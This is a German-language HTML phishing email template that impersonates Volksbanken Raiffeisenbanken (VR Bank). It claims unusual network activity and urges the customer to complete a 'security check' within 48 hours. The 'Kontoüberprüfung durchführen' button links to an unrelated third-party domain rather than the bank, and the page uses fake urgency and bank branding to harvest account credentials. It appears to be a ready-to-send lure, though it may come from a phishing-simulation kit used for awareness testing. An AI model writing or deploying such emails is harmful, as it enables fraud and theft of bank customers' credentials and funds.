<!DOCTYPE html>
<html lang="de">

<head>
    <meta charset="UTF-8">
    <title>Sicherheitsüberprüfung erforderlich</title>
    <style>
        .header_blue {
            background-color: #003366;
            padding: 20px;
        }

        .header_white {
            background-color: #ffffff;
            padding: 10px;
        }

        body {
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            color: #333;
            line-height: 1.6;
            margin: 0;
            padding: 0;
        }

        .button {
            background-color: #0056b3;
            border: none;
            color: white !important;
            padding: 8px 15px;
            text-align: center;
            text-decoration: none;
            display: inline-block;
            font-size: 14px;
            margin-top: 10px;
            margin-bottom: 10px;
            cursor: pointer;
            border-radius: 2px;
            transition: background-color 0.3s;
        }

        .button:hover {
            background-color: #004494;
            color: white;
        }

        .header {
            color: #0056b3;
            font-size: 16px;
            margin-bottom: 16px;
            padding-bottom: 8px;
            font-weight: bold;
            border-bottom: 2px solid #eee;
        }

        img.logo {
            display: block;
            margin: 0px;
            width: 185px;
        }

        p {
            margin-bottom: 16px;
            font-size: 14px;
        }

        .container_content {
            padding-bottom: 0px;
            padding-left: 10px;
        }
        .container_content {
            padding-top: 5px;
            padding-left: 10px;
            background-color: #fff;
        }
    </style>
</head>

<body>
    <header class="header_blue">
    </header>
    <div class="header_white">
        <div class="container_header">
            <img src="Images/Logo.png" alt="VR Bank Logo" class="logo">
        </div>
    </div>
    <div class="container_content">
        <p class="header">Sehr geehrte(r) Kunde,</p>
        <p>wir haben in den letzten Tagen ungewöhnliche Aktivitäten in unserem Netzwerk festgestellt, die möglicherweise
            auch Ihr Konto betreffen könnten. <br>
            Als vorbeugende Maßnahme ist es unerlässlich, dass Sie an einer dringenden
            Sicherheitsüberprüfung teilnehmen, um den Schutz Ihrer persönlichen <br>
            und finanziellen Informationen sicherzustellen.</p>

        <p><strong>Warum ist diese Überprüfung notwendig?</strong><br>
            Unsere jüngsten Sicherheitsberichte zeigen, dass es Versuche gab, auf Kundendaten unbefugt zuzugreifen. Um
            Ihre Identität zu bestätigen und sicherzustellen, <br>
            dass kein unbefugter Zugriff auf Ihr Konto erfolgt ist, ist eine sofortige Überprüfung erforderlich.</p>

        <p><strong>Wie können Sie handeln?</strong><br>
            Bitte klicken Sie auf den untenstehenden Link, um Ihre Kontodaten zu überprüfen. Es ist wichtig, dass Sie
            diese Überprüfung so schnell wie möglich durchführen, <br>
            um potenzielle Risiken zu minimieren und die Sicherheit Ihres Kontos zu gewährleisten.</p>

        <p>Die Überprüfung nimmt nur wenige Minuten in Anspruch und ist ein wichtiger Schritt zum Schutz Ihrer
            persönlichen Informationen. Bitte beachten Sie, dass diese <br>
            Überprüfung innerhalb der nächsten 48 Stunden durchgeführt werden muss, um eventuelle Einschränkungen 
            Ihres Kontozugangs zu vermeiden.</p>

        <p>Wir verstehen, dass Sicherheit für Sie von höchster Priorität ist und danken Ihnen im Voraus für Ihre
            schnelle Reaktion.</p>

        <p>Bei Fragen oder wenn Sie Unterstützung benötigen, zögern Sie nicht, uns zu kontaktieren.</p>

        <a href="https://www.johannesjacobschneider.com/index.php" class="button">Kontoüberprüfung durchführen</a>

        <p>Mit freundlichen Grüßen,</p>
        <p>Ihre Volksbanken Raiffeisenbanken Team</p>
    </div>
</body>

</html>

